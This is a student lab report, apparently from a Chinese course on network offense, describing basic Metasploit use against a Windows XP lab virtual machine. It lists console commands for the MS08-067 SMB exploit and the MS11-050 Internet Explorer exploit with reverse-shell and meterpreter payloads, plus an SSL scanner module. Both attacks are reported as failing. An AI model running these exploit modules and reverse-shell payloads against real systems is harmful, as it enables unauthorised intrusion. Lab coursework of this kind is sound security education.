zoukankan      html  css  js  c++  java
  • 20145338 《网络对抗》 MSF基础应用

    20145338《网络对抗》 MSF基础应用

    实验内容

    ·掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路。
    具体需要完成(1)一个主动攻击;(2)一个针对浏览器的攻击;(3)一个针对客户端的攻击;(4)成功应用任何一个辅助模块。

    基础问题回答

    ·exploit:通过漏洞对程序攻击的途径,是一种手段或通道。
    ·payload:具体的攻击代码
    ·encode:伪装、隐藏 达到免杀目的。

    实践过程

    MS08_067安全漏洞渗透攻击实践

    实验前先查看kali与靶机是否可以ping通

    靶机为我这次新拷的WinXPenSP3
    (将Kali与靶机网络调制NAT模式,否则ping不通啊)


    1 ·输入msfconsole进入msf

    2 ·进入该漏洞模块的使用(use exploit/windows/smb/ms08_067_netapi)
    3 ·输入命令show payload会显示出有效的攻击载荷,

    4 ·show targets会显示出可以被攻击的靶机的操作系统型号

    5 ·设置攻击有效载荷(set payload generic/shell_reverse_tcp)

    6 ·输入show options显示我们需要在攻击前需要设置的数据,将靶机IP(RHOST)与kali IP(LHOST)进行设置

    7 ·输入exploit开始攻击

    攻击失败。。。。未完待续。。

    呀 ping都没ping通 不失败才怪哦 。。。
    继续。。。

    IE浏览器渗透攻击——MS11050安全漏洞

    ·在kali终端开启msfconsole,利用search命令搜索。

    输入命令use exploit/windows/browser/ms11_050_mshtml_cobjetelement,进入该漏洞模块。使用info命令查看模块信息 。

    设置对应的载荷set payload windows/meterpreter/reverese_tcp;show options查看需要设置的相关信息:

    查看配置渗透攻击所需的配置选项

    配置相关信息:set LHOST; ‘kali Ip’;; set LPORT 5338; set URIPATH ,


    启动exploit 生成攻击


    攻击失败.

    Adobe阅读器渗透攻击

    辅助模块

    我选择auxiliary/scanner/ssl/openssl_ccs.rb
    ·在auxiliary中选择scanner中的ssl其中一个模块ccs.rb

    ·通过info查看需要配置的东西


    ·开始扫描

    实验体会

    比起做不出实验更让人难受的是电脑卡的要死 有时候lali还罢工 直接就打不开了,状况百出。大家看到的是什么时候交的博客 并不知道在底下配置电脑花了多久。。
    不过也还好 已经完成一个。

  • 相关阅读:
    线性变换
    施密特正交化
    春有它的记忆,秋有它的情怀
    最美的动作其实只需要嘴角上扬-微笑
    pomotime_v1.7.2 番茄软件完全教程
    NGUI 之 不为人知的 NGUITools
    Unity3D 开发 之 加载Android应用的环境
    Unity3D 开发 之 JDK安装与环境变量配置
    Tesseract 对验证码的识别原理和实现步骤
    sizeof_and_strlen 的区别
  • 原文地址:https://www.cnblogs.com/SUONAM1114----/p/6720482.html
Copyright © 2011-2022 走看看